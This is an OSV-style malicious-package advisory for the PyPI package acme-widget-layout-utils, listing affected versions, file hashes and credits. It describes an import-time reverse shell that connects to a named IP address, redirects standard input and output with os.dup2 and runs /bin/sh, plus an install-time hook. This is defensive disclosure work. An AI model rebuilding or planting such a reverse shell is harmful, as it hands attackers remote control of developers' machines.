{"id":"MAL-2026-5545","summary":"Malicious code in acme-widget-layout-utils (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600)\nOn first import, src/acme_widget_layout_utils/__init__.py (lines 13-17) opens a TCP socket to 34.69.137.236:80, duplicates stdin/stdout/stderr onto the socket via os.dup2, and execs /bin/sh -i — a textbook interactive reverse shell handing remote shell access to whoever controls 34.69.137.236. The behavior is unconditional and fires the moment any consumer runs `import acme_widget_layout_utils`. setup.py additionally installs a custom install command that writes /tmp/pypi_install_hook_marker.txt at install time, corroborating the package's role as a deliberately crafted attack artifact. The package name suggests benign UI/layout utilities and contains no such functionality; the pyproject.toml description openly self-identifies as a 'pentest C2 target', but the package is published on public PyPI under a generic name where any developer searching for widget/layout helpers can incidentally install and be backdoored. README's 'authorized pentest' framing does not change installer-side impact.\n\n## Source: kam193 (643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8)\nDuring import, the package starts a reverse shell.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-acme-widget-layout-utils\n\n\nReasons (based on the campaign):\n\n\n - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.\n","modified":"2026-06-11T08:01:34.000735632Z","published":"2026-06-11T01:46:15Z","database_specific":{"malicious-packages-origins":[{"sha256":"42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600","import_time":"2026-06-11T02:24:27.554501614Z","id":"IN-MAL-2026-005357","modified_time":"2026-06-11T01:46:15Z","source":"amazon-inspector","versions":["0.0.3"]},{"id":"pypi/2026-06-acme-widget-layout-utils/acme-widget-layout-utils","import_time":"2026-06-11T07:49:46.172073804Z","sha256":"643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8","modified_time":"2026-06-11T05:40:39.931561Z","source":"kam193","versions":["0.0.1","0.0.2","0.0.3"]}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/acme-widget-layout-utils/0.0.3/"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/acme-widget-layout-utils"}],"affected":[{"package":{"name":"acme-widget-layout-utils","ecosystem":"PyPI","purl":"pkg:pypi/acme-widget-layout-utils"},"versions":["0.0.3","0.0.1","0.0.2"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"611dbc535af11a1b91d66630e0f56d6a7a7174e74f46907fb8291d738448738c","tlsh":"c701cb8bcc2ad09a5f72a1918061c068de57a8031b3818b2bdec53146bf302561b4932","path":"src/acme_widget_layout_utils/__init__.py"},{"tlsh":"7fe02646983f7070ad9383a488b346121c23c6605bf0e2a674fe1a715f931e6cc478c3","sha256":"4ed96d4110ec206f50864acb834b2f11808cb903df3b39a876a3ebcf8fe66eea","path":"setup.py"},{"tlsh":"31e06823cb775965eac164446051a167cdf2e8d92dc0d85c8acfc9983cee0e9c6f8929","sha256":"1ed303a16226ddc822f2fb6d1d148805a1c09eb5577cfaa92220f7588902097f","path":"pyproject.toml"}],"package_integrity":[{"hashes":{"sha256":"6ac0e78622500c826abe1209dc38b736dc0efdbdf350de726cf61dcb7da7834a","blake2b_256":"38246aec6a745e8f7660a345797c632829f16c2f5b9bf30ea6ba2a19f9b11b53","md5":"f4295d1297c0cb74a638a3ad949d0817"},"filename":"acme_widget_layout_utils-0.0.3-py3-none-any.whl"},{"hashes":{"sha256":"58cea9e8965d0148962288648322bebcd4ddf5576169269981612a9c729bd233","blake2b_256":"a2a54dc0b1fd6fb75fd5d3f0d66ff1e64cfd2f20f72d07e275683859946b26d8","md5":"5bd41cffddaf6808608d6875b0a9dc38"},"filename":"acme_widget_layout_utils-0.0.3.tar.gz"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/acme-widget-layout-utils/MAL-2026-5545.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}